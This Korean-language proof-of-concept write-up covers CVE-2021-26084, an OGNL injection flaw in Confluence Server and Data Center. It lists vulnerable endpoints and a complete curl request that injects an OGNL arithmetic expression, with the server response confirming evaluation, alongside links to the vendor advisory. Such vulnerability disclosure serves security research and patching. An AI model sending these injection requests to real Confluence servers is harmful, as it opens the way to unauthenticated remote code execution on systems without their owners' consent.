
CVE-2021-26084에 대한 개념 증명 익스플로잇 — Confluence Server 및 Data Center의 OGNL 인젝션 취약점으로, 인증되지 않은 원격 코드 실행을 시연합니다.
OGNL 주입 취약점이 존재하며, 인증된 사용자, 경우에 따라 인증되지 않은 사용자가 Confluence Server 또는 Data Center 인스턴스에서 임의 코드를 실행할 수 있습니다.

진입점과 주입을 찾기 위한 나의 싸움 XD
| 싸움 (1) | 싸움 (2) |
|---|---|
![]() | ![]() |
마지막으로 Confluence 진입점 익스플로잇
https://<REDACTED>/users/user-dark-features
https://<REDACTED>/login
https://<REDACTED>/pages/templates2/viewpagetemplate.action
https://<REDACTED>/template/custom/content-editor
https://<REDACTED>/templates/editor-preload-container
https://<REDACTED>/pages/createpage-entervariables.action
나의 첫 번째 수동 검사: 참고: 사전 인증된 사용자
# curl -i -s -k -X $'POST' -H $'Host: <REDACTED>' -H $'User-Agent: alex666' -H $'Connection: close' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 44' -b $'JSESSIONID=<REDACTED>' --data-binary $'queryString=alt3kx\\u0027%2b#{6*666}%2b\\u0027' $'https://<REDACTED>/pages/createpage-entervariables.action'
Server Response:
HTTP/1.1 200
X-ASEN: <REDACTED>
Expires: Thu, 01 Jan 1970 00:00:00 GMT
<REDACTED>
[../snip]
<input type="hidden" name="queryString" value="alt3kx{3996=null}" />
https://jira.atlassian.com/browse/CONFSERVER-67940
https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html
훌륭한 분석 게시물:
https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md
매우 유용한 힌트 제공:
@wvuuuuuuuuuuuuu
@iamnoooob
Alex Hernandez 일명 (@_alt3kx_)